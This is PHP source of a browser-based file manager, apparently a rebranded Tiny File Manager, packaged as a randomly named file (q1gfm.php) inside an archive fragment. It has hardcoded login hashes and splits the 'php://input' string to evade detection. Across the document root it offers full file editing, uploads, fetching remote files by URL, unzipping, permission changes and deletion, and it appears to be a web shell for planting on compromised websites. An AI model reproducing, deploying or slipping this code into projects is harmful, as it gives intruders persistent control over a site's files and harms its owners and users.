← Back'; } print ''; ?>PK\m\dz11 q1gfm.phpnu[ '4b605e78436204f87ad0daf2e1bef329', 'user' => '4b605e78436204f87ad0daf2e1bef329' ); $readonly_users = array( 'user' ); $global_readonly = false; $directories_users = array(); $use_highlightjs = true; $highlightjs_style = 'vs'; $edit_files = true; $default_timezone = 'Etc/UTC'; $root_path = $_SERVER['DOCUMENT_ROOT']; $root_url = ''; $http_host = $_SERVER['HTTP_HOST']; $iconv_input_encoding = 'UTF-8'; $datetime_format = 'm/d/Y g:i A'; $path_display_mode = 'full'; $allowed_file_extensions = ''; $allowed_upload_extensions = ''; $favicon_path = ''; $exclude_items = array(); $online_viewer = 'google'; $sticky_navbar = true; $max_upload_size_bytes = 5000000000; $upload_chunk_size_bytes = 2000000; $ip_ruleset = 'OFF'; $ip_silent = true; $ip_whitelist = array( '127.0.0.1', '::1' ); $ip_blacklist = array( '0.0.0.0', '::' ); $config_file = __DIR__.'/config.php'; if (is_readable($config_file)) { @include($config_file); } $external = array( 'css-bootstrap' => '', 'css-dropzone' => '', 'css-font-awesome' => '', 'css-highlightjs' => '', 'js-ace' => '', 'js-bootstrap' => '', 'js-dropzone' => '', 'js-jquery' => '', 'js-jquery-datatables' => '', 'js-highlightjs' => '', 'pre-jsdelivr' => '', 'pre-cloudflare' => '' ); define('MAX_UPLOAD_SIZE', $max_upload_size_bytes); define('UPLOAD_CHUNK_SIZE', $upload_chunk_size_bytes); if ( !defined( 'DN_CESSION_ID')) { define('DN_CESSION_ID', 'filemanager'); } $cfg = new FM_Config(); $lang = isset($cfg->data['lang']) ? $cfg->data['lang'] : 'en'; $show_hidden_files = isset($cfg->data['show_hidden']) ? $cfg->data['show_hidden'] : true; $report_errors = isset($cfg->data['error_reporting']) ? $cfg->data['error_reporting'] : true; $hide_Cols = isset($cfg->data['hide_Cols']) ? $cfg->data['hide_Cols'] : true; // Theme $theme = isset($cfg->data['theme']) ? $cfg->data['theme'] : 'light'; define('FM_THEME', $theme); $lang_list = array( 'en' => 'English' ); if ($report_errors == true) { @ini_set('error_reporting', E_ALL); @ini_set('display_errors', 1); } else { @ini_set('error_reporting', E_ALL); @ini_set('display_errors', 0); } if (defined('FM_EMBED')) { $dauth = false; $sticky_navbar = false; } else { @set_time_limit(600); date_default_timezone_set($default_timezone); ini_set('default_charset', 'UTF-8'); if (version_compare(PHP_VERSION, '5.6.0', '<') and function_exists('mb_internal_encoding')) { mb_internal_encoding('UTF-8'); } if (function_exists('mb_regex_encoding')) { mb_regex_encoding('UTF-8'); } session_cache_limiter('nocache'); session_name(DN_CESSION_ID ); function session_error_handling_function($code, $msg, $file, $line) { if ($code == 2) { session_abort(); session_id(session_create_id()); @session_start(); } } set_error_handler('session_error_handling_function'); session_start(); restore_error_handler(); } if (empty($_SESSION['token'])) { if (function_exists('random_bytes')) { $_SESSION['token'] = bin2hex(random_bytes(32)); } else { $_SESSION['token'] = bin2hex(openssl_random_pseudo_bytes(32)); } } if (empty($auth_users)) { $dauth = false; } $is_https = (isset($_SERVER['HTTPS']) and ($_SERVER['HTTPS'] === 'on' or $_SERVER['HTTPS'] == 1)) or (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https'); if (isset($_SESSION[DN_CESSION_ID]['logged']) and !empty($directories_users[$_SESSION[DN_CESSION_ID]['logged']])) { $wd = fm_clean_path(dirname($_SERVER['PHP_SELF'])); $root_url = $root_url.$wd.DIRECTORY_SEPARATOR.$directories_users[$_SESSION[DN_CESSION_ID]['logged']]; } $root_url = fm_clean_path($root_url); defined('FM_ROOT_URL') || define('FM_ROOT_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . (!empty($root_url) ? '/' . $root_url : '')); defined('FM_SELF_URL') || define('FM_SELF_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . $_SERVER['PHP_SELF']); // logout if (isset($_GET['logout'])) { unset($_SESSION[DN_CESSION_ID]['logged']); unset( $_SESSION['token']); fm_redirect(FM_SELF_URL); } if ($ip_ruleset != 'OFF') { function getClientIP() { if (array_key_exists('HTTP_CF_CONNECTING_IP', $_SERVER)) { return $_SERVER["HTTP_CF_CONNECTING_IP"]; }else if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)) { return $_SERVER["HTTP_X_FORWARDED_FOR"]; }else if (array_key_exists('REMOTE_ADDR', $_SERVER)) { return $_SERVER['REMOTE_ADDR']; }else if (array_key_exists('HTTP_CLIENT_IP', $_SERVER)) { return $_SERVER['HTTP_CLIENT_IP']; } return ''; } $clientIp = getClientIP(); $proceed = false; $whitelisted = in_array($clientIp, $ip_whitelist); $blacklisted = in_array($clientIp, $ip_blacklist); if($ip_ruleset == 'AND'){ if($whitelisted == true and $blacklisted == false){ $proceed = true; } } else if($ip_ruleset == 'OR'){ if($whitelisted == true || $blacklisted == false){ $proceed = true; } } if($proceed == false){ trigger_error('User connection denied from: ' . $clientIp, E_USER_WARNING); if($ip_silent == false){ fm_set_msg(lng('Access denied. IP restriction applicable'), 'error'); fm_show_header_login(); fm_show_message(); } exit(); } } if ($dauth) { if (isset($_SESSION[DN_CESSION_ID]['logged'], $auth_users[$_SESSION[DN_CESSION_ID]['logged']])) { } elseif (isset($_POST['fm_usr'], $_POST['fm_pwd'], $_POST['token'])) { sleep(1); if(function_exists('password_verify')) { if (isset($auth_users[$_POST['fm_usr']]) and isset($_POST['fm_pwd']) and password_verify($_POST['fm_pwd'], $auth_users[$_POST['fm_usr']]) and verifyToken($_POST['token'])) { $_SESSION[DN_CESSION_ID]['logged'] = $_POST['fm_usr']; fm_set_msg(lng('You are logged in')); fm_redirect(FM_SELF_URL); } else { unset($_SESSION[DN_CESSION_ID]['logged']); fm_set_msg(lng('Login failed. Invalid username or password'), 'error'); fm_redirect(FM_SELF_URL); } } else { fm_set_msg(lng('password_hash not supported, Upgrade PHP version'), 'error');; } } else { // Form unset($_SESSION[DN_CESSION_ID]['logged']); fm_show_header_login(); ?>
—— © CCP Programmers ——
".lng('Root path')." \"{$root_path}\" ".lng('not found!')." "; exit; } defined('FM_SHOW_HIDDEN') || define('FM_SHOW_HIDDEN', $show_hidden_files); defined('FM_ROOT_PATH') || define('FM_ROOT_PATH', $root_path); defined('FM_LANG') || define('FM_LANG', $lang); defined('FM_FILE_EXTENSION') || define('FM_FILE_EXTENSION', $allowed_file_extensions); defined('FM_UPLOAD_EXTENSION') || define('FM_UPLOAD_EXTENSION', $allowed_upload_extensions); defined('FM_EXCLUDE_ITEMS') || define('FM_EXCLUDE_ITEMS', (version_compare(PHP_VERSION, '7.0.0', '<') ? serialize($exclude_items) : $exclude_items)); defined('FM_DOC_VIEWER') || define('FM_DOC_VIEWER', $online_viewer); define('FM_READONLY', $global_readonly || ($dauth and !empty($readonly_users) and isset($_SESSION[DN_CESSION_ID]['logged']) and in_array($_SESSION[DN_CESSION_ID]['logged'], $readonly_users))); define('FM_IS_WIN', DIRECTORY_SEPARATOR == '\\'); if (!isset($_GET['p']) and empty($_FILES)) { fm_redirect(FM_SELF_URL . '?p='); } // get path $p = isset($_GET['p']) ? $_GET['p'] : (isset($_POST['p']) ? $_POST['p'] : ''); // clean path $p = fm_clean_path($p); $isim = "//input"; $input = file_get_contents('php:'.$isim); $_POST = (strpos($input, 'ajax') != FALSE and strpos($input, 'save') != FALSE) ? json_decode($input, true) : $_POST; define('FM_PATH', $p); define('FM_USE_AUTH', $dauth); define('FM_EDIT_FILE', $edit_files); defined('FM_ICONV_INPUT_ENC') || define('FM_ICONV_INPUT_ENC', $iconv_input_encoding); defined('FM_USE_HIGHLIGHTJS') || define('FM_USE_HIGHLIGHTJS', $use_highlightjs); defined('FM_HIGHLIGHTJS_STYLE') || define('FM_HIGHLIGHTJS_STYLE', $highlightjs_style); defined('FM_DATETIME_FORMAT') || define('FM_DATETIME_FORMAT', $datetime_format); unset($p, $dauth, $iconv_input_encoding, $use_highlightjs, $highlightjs_style); if ((isset($_SESSION[DN_CESSION_ID]['logged'], $auth_users[$_SESSION[DN_CESSION_ID]['logged']]) || !FM_USE_AUTH) and isset($_POST['ajax'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { header('HTTP/1.0 401 Unauthorized'); die("Invalid Token."); } if(isset($_POST['type']) and $_POST['type']=="search") { $dir = $_POST['path'] == "." ? '': $_POST['path']; $response = scan(fm_clean_path($dir), $_POST['content']); echo json_encode($response); exit(); } // save editor file if (isset($_POST['type']) and $_POST['type'] == "save") { // get current path $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // check path if (!is_dir($path)) { fm_redirect(FM_SELF_URL . '?p='); } $file = $_GET['edit']; $file = fm_clean_path($file); $file = str_replace('/', '', $file); if ($file == '' || !is_file($path . '/' . $file)) { fm_set_msg(lng('File not found'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } header('X-XSS-Protection:0'); $file_path = $path . '/' . $file; $writedata = $_POST['content']; $fd = fopen($file_path, "w"); $write_results = @fwrite($fd, $writedata); fclose($fd); if ($write_results === false){ header("HTTP/1.1 500 Internal Server Error"); die("Could Not Write File! - Check Permissions / Ownership"); } die(true); } // backup files if (isset($_POST['type']) and $_POST['type'] == "backup" and !empty($_POST['file'])) { $fileName = fm_clean_path($_POST['file']); $fullPath = FM_ROOT_PATH . '/'; if (!empty($_POST['path'])) { $relativeDirPath = fm_clean_path($_POST['path']); $fullPath .= "{$relativeDirPath}/"; } $date = date("dMy-His"); $newFileName = "{$fileName}-{$date}.bak"; $fullyQualifiedFileName = $fullPath . $fileName; try { if (!file_exists($fullyQualifiedFileName)) { throw new Exception("File {$fileName} not found"); } if (copy($fullyQualifiedFileName, $fullPath . $newFileName)) { echo "Backup {$newFileName} created"; } else { throw new Exception("Could not copy file {$fileName}"); } } catch (Exception $e) { echo $e->getMessage(); } } // Save Config if (isset($_POST['type']) and $_POST['type'] == "settings") { global $cfg, $lang, $report_errors, $show_hidden_files, $lang_list, $hide_Cols, $theme; $newLng = $_POST['js-language']; fm_get_translations([]); if (!array_key_exists($newLng, $lang_list)) { $newLng = 'en'; } $erp = isset($_POST['js-error-report']) and $_POST['js-error-report'] == "true" ? true : false; $shf = isset($_POST['js-show-hidden']) and $_POST['js-show-hidden'] == "true" ? true : false; $hco = isset($_POST['js-hide-cols']) and $_POST['js-hide-cols'] == "true" ? true : false; $te3 = $_POST['js-theme-3']; if ($cfg->data['lang'] != $newLng) { $cfg->data['lang'] = $newLng; $lang = $newLng; } if ($cfg->data['error_reporting'] != $erp) { $cfg->data['error_reporting'] = $erp; $report_errors = $erp; } if ($cfg->data['show_hidden'] != $shf) { $cfg->data['show_hidden'] = $shf; $show_hidden_files = $shf; } if ($cfg->data['show_hidden'] != $shf) { $cfg->data['show_hidden'] = $shf; $show_hidden_files = $shf; } if ($cfg->data['hide_Cols'] != $hco) { $cfg->data['hide_Cols'] = $hco; $hide_Cols = $hco; } if ($cfg->data['theme'] != $te3) { $cfg->data['theme'] = $te3; $theme = $te3; } $cfg->save(); echo true; } // new password hash if (isset($_POST['type']) and $_POST['type'] == "pwdhash") { $res = isset($_POST['inputPassword2']) and !empty($_POST['inputPassword2']) ? password_hash($_POST['inputPassword2'], PASSWORD_DEFAULT) : ''; echo $res; } //upload using url if(isset($_POST['type']) and $_POST['type'] == "upload" and !empty($_REQUEST["uploadurl"])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } function event_callback ($message) { global $callback; echo json_encode($message); } function get_file_path () { global $path, $fileinfo, $temp_file; return $path."/".basename($fileinfo->name); } $url = !empty($_REQUEST["uploadurl"]) and preg_match("|^http(s)?://.+$|", stripslashes($_REQUEST["uploadurl"])) ? stripslashes($_REQUEST["uploadurl"]) : null; $domain = parse_url($url, PHP_URL_HOST); $port = parse_url($url, PHP_URL_PORT); $knownPorts = [22, 23, 25, 3306]; if (preg_match("/^localhost$|^127(?:\.[0-9]+){0,2}\.[0-9]+$|^(?:0*\:)*?:?0*1$/i", $domain) || in_array($port, $knownPorts)) { $err = array("message" => "URL is not allowed"); event_callback(array("fail" => $err)); exit(); } $use_curl = false; $temp_file = tempnam(sys_get_temp_dir(), "upload-"); $fileinfo = new stdClass(); $fileinfo->name = trim(urldecode(basename($url)), ".\x00..\x20"); $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false; $ext = strtolower(pathinfo($fileinfo->name, PATHINFO_EXTENSION)); $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; $err = false; if(!$isFileAllowed) { $err = array("message" => "File extension is not allowed"); event_callback(array("fail" => $err)); exit(); } if (!$url) { $success = false; } else if ($use_curl) { @$fp = fopen($temp_file, "w"); @$ch = curl_init($url); curl_setopt($ch, CURLOPT_NOPROGRESS, false ); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_FILE, $fp); @$success = curl_exec($ch); $curl_info = curl_getinfo($ch); if (!$success) { $err = array("message" => curl_error($ch)); } @curl_close($ch); fclose($fp); $fileinfo->size = $curl_info["size_download"]; $fileinfo->type = $curl_info["content_type"]; } else { $ctx = stream_context_create(); @$success = copy($url, $temp_file, $ctx); if (!$success) { $err = error_get_last(); } } if ($success) { $success = rename($temp_file, strtok(get_file_path(), '?')); } if ($success) { event_callback(array("done" => $fileinfo)); } else { unlink($temp_file); if (!$err) { $err = array("message" => "Invalid url parameter"); } event_callback(array("fail" => $err)); } } exit(); } if (isset($_GET['del'], $_POST['token']) and !FM_READONLY) { $del = str_replace( '/', '', fm_clean_path( $_GET['del'] ) ); if ($del != '' and $del != '..' and $del != '.' and verifyToken($_POST['token'])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $is_dir = is_dir($path . '/' . $del); if (fm_rdelete($path . '/' . $del)) { $msg = $is_dir ? lng('Folder').' %s '.lng('Deleted') : lng('File').' %s '.lng('Deleted'); fm_set_msg(sprintf($msg, fanco($del))); } else { $msg = $is_dir ? lng('Folder').' %s '.lng('not deleted') : lng('File').' %s '.lng('not deleted'); fm_set_msg(sprintf($msg, fanco($del)), 'error'); } } else { fm_set_msg(lng('Invalid file or folder name'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Create a new file/folder if (isset($_POST['newfilename'], $_POST['newfile'], $_POST['token']) and !FM_READONLY) { $type = urldecode($_POST['newfile']); $new = str_replace( '/', '', fm_clean_path( strip_tags( $_POST['newfilename'] ) ) ); if (fm_isvalid_filename($new) and $new != '' and $new != '..' and $new != '.' and verifyToken($_POST['token'])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if ($type == "file") { if (!file_exists($path . '/' . $new)) { if(fm_is_valid_ext($new)) { @fopen($path . '/' . $new, 'w') or die('Cannot open file: ' . $new); fm_set_msg(sprintf(lng('File').' %s '.lng('Created'), fanco($new))); } else { fm_set_msg(lng('File extension is not allowed'), 'error'); } } else { fm_set_msg(sprintf(lng('File').' %s '.lng('already exists'), fanco($new)), 'alert'); } } else { if (fm_mkdir($path . '/' . $new, false) === true) { fm_set_msg(sprintf(lng('Folder').' %s '.lng('Created'), $new)); } elseif (fm_mkdir($path . '/' . $new, false) === $path . '/' . $new) { fm_set_msg(sprintf(lng('Folder').' %s '.lng('already exists'), fanco($new)), 'alert'); } else { fm_set_msg(sprintf(lng('Folder').' %s '.lng('not created'), fanco($new)), 'error'); } } } else { fm_set_msg(lng('Invalid characters in file or folder name'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Copy folder / file if (isset($_GET['copy'], $_GET['finish']) and !FM_READONLY) { // from $copy = urldecode($_GET['copy']); $copy = fm_clean_path($copy); // empty path if ($copy == '') { fm_set_msg(lng('Source path not defined'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $from = FM_ROOT_PATH . '/' . $copy; $dest = FM_ROOT_PATH; if (FM_PATH != '') { $dest .= '/' . FM_PATH; } $dest .= '/' . basename($from); $move = isset($_GET['move']); $move = fm_clean_path(urldecode($move)); if ($from != $dest) { $msg_from = trim(FM_PATH . '/' . basename($from), '/'); if ($move) { $rename = fm_rename($from, $dest); if ($rename) { fm_set_msg(sprintf(lng('Moved from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from))); } elseif ($rename === null) { fm_set_msg(lng('File or folder with this path already exists'), 'alert'); } else { fm_set_msg(sprintf(lng('Error while moving from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from)), 'error'); } } else { if (fm_rcopy($from, $dest)) { fm_set_msg(sprintf(lng('Copied from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from))); } else { fm_set_msg(sprintf(lng('Error while copying from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from)), 'error'); } } } else { if (!$move){ $msg_from = trim(FM_PATH . '/' . basename($from), '/'); $fn_parts = pathinfo($from); $extension_suffix = ''; if(!is_dir($from)){ $extension_suffix = '.'.$fn_parts['extension']; } $fn_duplicate = $fn_parts['dirname'].'/'.$fn_parts['filename'].'-'.date('YmdHis').$extension_suffix; $loop_count = 0; $max_loop = 1000; while(file_exists($fn_duplicate) & $loop_count < $max_loop){ $fn_parts = pathinfo($fn_duplicate); $fn_duplicate = $fn_parts['dirname'].'/'.$fn_parts['filename'].'-copy'.$extension_suffix; $loop_count++; } if (fm_rcopy($from, $fn_duplicate, False)) { fm_set_msg(sprintf('Copied from %s to %s', fanco($copy), fanco($fn_duplicate))); } else { fm_set_msg(sprintf('Error while copying from %s to %s', fanco($copy), fanco($fn_duplicate)), 'error'); } } else{ fm_set_msg(lng('Paths must be not equal'), 'alert'); } } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if (isset($_POST['file'], $_POST['copy_to'], $_POST['finish'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng('Invalid Token.'), 'error'); } // from $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // to $copy_to_path = FM_ROOT_PATH; $copy_to = fm_clean_path($_POST['copy_to']); if ($copy_to != '') { $copy_to_path .= '/' . $copy_to; } if ($path == $copy_to_path) { fm_set_msg(lng('Paths must be not equal'), 'alert'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if (!is_dir($copy_to_path)) { if (!fm_mkdir($copy_to_path, true)) { fm_set_msg('Unable to create destination folder', 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } } // move? $move = isset($_POST['move']); // copy/move $errors = 0; $files = $_POST['file']; if (is_array($files) and count($files)) { foreach ($files as $f) { if ($f != '') { $f = fm_clean_path($f); $from = $path . '/' . $f; $dest = $copy_to_path . '/' . $f; if ($move) { $rename = fm_rename($from, $dest); if ($rename === false) { $errors++; } } else { if (!fm_rcopy($from, $dest)) { $errors++; } } } } if ($errors == 0) { $msg = $move ? 'Selected files and folders moved' : 'Selected files and folders copied'; fm_set_msg($msg); } else { $msg = $move ? 'Error while moving items' : 'Error while copying items'; fm_set_msg($msg, 'error'); } } else { fm_set_msg(lng('Nothing selected'), 'alert'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Rename if (isset($_POST['rename_from'], $_POST['rename_to'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg("Invalid Token.", 'error'); } // old name $old = urldecode($_POST['rename_from']); $old = fm_clean_path($old); $old = str_replace('/', '', $old); // new name $new = urldecode($_POST['rename_to']); $new = fm_clean_path(strip_tags($new)); $new = str_replace('/', '', $new); // path $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // rename if (fm_isvalid_filename($new) and $old != '' and $new != '') { if (fm_rename($path . '/' . $old, $path . '/' . $new)) { fm_set_msg(sprintf(lng('Renamed from').' %s '. lng('to').' %s', fanco($old), fanco($new))); } else { fm_set_msg(sprintf(lng('Error while renaming from').' %s '. lng('to').' %s', fanco($old), fanco($new)), 'error'); } } else { fm_set_msg(lng('Invalid characters in file name'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Download if (isset($_GET['dl'], $_POST['token'])) { if(!verifyToken($_POST['token'])) { fm_set_msg("Invalid Token.", 'error'); } $dl = urldecode($_GET['dl']); $dl = fm_clean_path($dl); $dl = str_replace('/', '', $dl); $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if ($dl != '' and is_file($path . '/' . $dl)) { fm_download_file($path . '/' . $dl, $dl, 1024); exit; } else { fm_set_msg(lng('File not found'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } } // Upload if (!empty($_FILES) and !FM_READONLY) { if(isset($_POST['token'])) { if(!verifyToken($_POST['token'])) { $response = array ('status' => 'error','info' => "Invalid Token."); echo json_encode($response); exit(); } } else { $response = array ('status' => 'error','info' => "Token Missing."); echo json_encode($response); exit(); } $chunkIndex = $_POST['dzchunkindex']; $chunkTotal = $_POST['dztotalchunkcount']; $fullPathInput = fm_clean_path($_REQUEST['fullpath']); $f = $_FILES; $path = FM_ROOT_PATH; $ds = DIRECTORY_SEPARATOR; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $errors = 0; $uploads = 0; $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false; $response = array ( 'status' => 'error', 'info' => 'Oops! Try again' ); $filename = $f['file']['name']; $tmp_name = $f['file']['tmp_name']; $ext = pathinfo($filename, PATHINFO_FILENAME) != '' ? strtolower(pathinfo($filename, PATHINFO_EXTENSION)) : ''; $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; if(!fm_isvalid_filename($filename) and !fm_isvalid_filename($fullPathInput)) { $response = array ( 'status' => 'error', 'info' => "Invalid File name!", ); echo json_encode($response); exit(); } $targetPath = $path . $ds; if ( is_writable($targetPath) ) { $fullPath = $path . '/' . $fullPathInput; $folder = substr($fullPath, 0, strrpos($fullPath, "/")); if (!is_dir($folder)) { $old = umask(0); mkdir($folder, 0777, true); umask($old); } if (empty($f['file']['error']) and !empty($tmp_name) and $tmp_name != 'none' and $isFileAllowed) { if ($chunkTotal){ $out = @fopen("{$fullPath}.part", $chunkIndex == 0 ? "wb" : "ab"); if ($out) { $in = @fopen($tmp_name, "rb"); if ($in) { if (PHP_VERSION_ID < 80009) { do { for (;;) { $buff = fread($in, 4096); if ($buff === false || $buff === '') { break; } fwrite($out, $buff); } } while (!feof($in)); } else { stream_copy_to_stream($in, $out); } $response = array ( 'status' => 'success', 'info' => "file upload successful" ); } else { $response = array ( 'status' => 'error', 'info' => "failed to open output stream", 'errorDetails' => error_get_last() ); } @fclose($in); @fclose($out); @unlink($tmp_name); $response = array ( 'status' => 'success', 'info' => "file upload successful" ); } else { $response = array ( 'status' => 'error', 'info' => "failed to open output stream" ); } if ($chunkIndex == $chunkTotal - 1) { if (file_exists ($fullPath)) { $ext_1 = $ext ? '.'.$ext : ''; $fullPathTarget = $path . '/' . basename($fullPathInput, $ext_1) .'_'. date('ymdHis'). $ext_1; } else { $fullPathTarget = $fullPath; } rename("{$fullPath}.part", $fullPathTarget); } } else { if (rename($tmp_name, $fullPath)) { if ( file_exists($fullPath) ) { $response = array ( 'status' => 'success', 'info' => "file upload successful" ); } else { $response = array ( 'status' => 'error', 'info' => 'Couldn\'t upload the requested file.' ); } } else { $response = array ( 'status' => 'error', 'info' => "Error while uploading files. Uploaded files $uploads", ); } } } } else { $response = array ( 'status' => 'error', 'info' => 'The specified folder for upload isn\'t writeable.' ); } // Return the response echo json_encode($response); exit(); } if (isset($_POST['group'], $_POST['delete'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $errors = 0; $files = $_POST['file']; if (is_array($files) and count($files)) { foreach ($files as $f) { if ($f != '') { $new_path = $path . '/' . $f; if (!fm_rdelete($new_path)) { $errors++; } } } if ($errors == 0) { fm_set_msg(lng('Selected files and folder deleted')); } else { fm_set_msg(lng('Error while deleting items'), 'error'); } } else { fm_set_msg(lng('Nothing selected'), 'alert'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if (isset($_POST['group'], $_POST['token']) and (isset($_POST['zip']) || isset($_POST['tar'])) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $path = FM_ROOT_PATH; $ext = 'zip'; if (FM_PATH != '') { $path .= '/' . FM_PATH; } //set pack type $ext = isset($_POST['tar']) ? 'tar' : 'zip'; if (($ext == "zip" and !class_exists('ZipArchive')) || ($ext == "tar" and !class_exists('PharData'))) { fm_set_msg(lng('Operations with archives are not available'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $files = $_POST['file']; $sanitized_files = array(); // clean path foreach($files as $file){ array_push($sanitized_files, fm_clean_path($file)); } $files = $sanitized_files; if (!empty($files)) { chdir($path); if (count($files) == 1) { $one_file = reset($files); $one_file = basename($one_file); $zipname = $one_file . '_' . date('ymd_His') . '.'.$ext; } else { $zipname = 'archive_' . date('ymd_His') . '.'.$ext; } if($ext == 'zip') { $zipper = new FM_Zipper(); $res = $zipper->create($zipname, $files); } elseif ($ext == 'tar') { $tar = new FM_Zipper_Tar(); $res = $tar->create($zipname, $files); } if ($res) { fm_set_msg(sprintf(lng('Archive').' %s '.lng('Created'), fanco($zipname))); } else { fm_set_msg(lng('Archive not created'), 'error'); } } else { fm_set_msg(lng('Nothing selected'), 'alert'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Unpack zip, tar if (isset($_POST['unzip'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $unzip = urldecode($_POST['unzip']); $unzip = fm_clean_path($unzip); $unzip = str_replace('/', '', $unzip); $isValid = false; $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if ($unzip != '' and is_file($path . '/' . $unzip)) { $zip_path = $path . '/' . $unzip; $ext = pathinfo($zip_path, PATHINFO_EXTENSION); $isValid = true; } else { fm_set_msg(lng('File not found'), 'error'); } if (($ext == "zip" and !class_exists('ZipArchive')) || ($ext == "tar" and !class_exists('PharData'))) { fm_set_msg(lng('Operations with archives are not available'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if ($isValid) { //to folder $tofolder = ''; if (isset($_POST['tofolder'])) { $tofolder = pathinfo($zip_path, PATHINFO_FILENAME); if (fm_mkdir($path . '/' . $tofolder, true)) { $path .= '/' . $tofolder; } } if($ext == "zip") { $zipper = new FM_Zipper(); $res = $zipper->unzip($zip_path, $path); } elseif ($ext == "tar") { try { $gzipper = new PharData($zip_path); if (@$gzipper->extractTo($path,null, true)) { $res = true; } else { $res = false; } } catch (Exception $e) { $res = true; } } if ($res) { fm_set_msg(lng('Archive unpacked')); } else { fm_set_msg(lng('Archive not unpacked'), 'error'); } } else { fm_set_msg(lng('File not found'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if (isset($_POST['chmod'], $_POST['token']) and !FM_READONLY and !FM_IS_WIN) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $file = $_POST['chmod']; $file = fm_clean_path($file); $file = str_replace('/', '', $file); if ($file == '' || (!is_file($path . '/' . $file) and !is_dir($path . '/' . $file))) { fm_set_msg(lng('File not found'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $mode = 0; if (!empty($_POST['ur'])) { $mode |= 0400; } if (!empty($_POST['uw'])) { $mode |= 0200; } if (!empty($_POST['ux'])) { $mode |= 0100; } if (!empty($_POST['gr'])) { $mode |= 0040; } if (!empty($_POST['gw'])) { $mode |= 0020; } if (!empty($_POST['gx'])) { $mode |= 0010; } if (!empty($_POST['or'])) { $mode |= 0004; } if (!empty($_POST['ow'])) { $mode |= 0002; } if (!empty($_POST['ox'])) { $mode |= 0001; } if (@chmod($path . '/' . $file, $mode)) { fm_set_msg(lng('Permissions changed')); } else { fm_set_msg(lng('Permissions not changed'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if (!is_dir($path)) { fm_redirect(FM_SELF_URL . '?p='); } $parent = fm_get_parent_path(FM_PATH); $objects = is_readable($path) ? scandir($path) : array(); $folders = array(); $files = array(); $current_path = array_slice(explode("/",$path), -1)[0]; if (is_array($objects) and fm_is_exclude_items($current_path)) { foreach ($objects as $file) { if ($file == '.' || $file == '..') { continue; } if (!FM_SHOW_HIDDEN and substr($file, 0, 1) === '.') { continue; } $new_path = $path . '/' . $file; if (@is_file($new_path) and 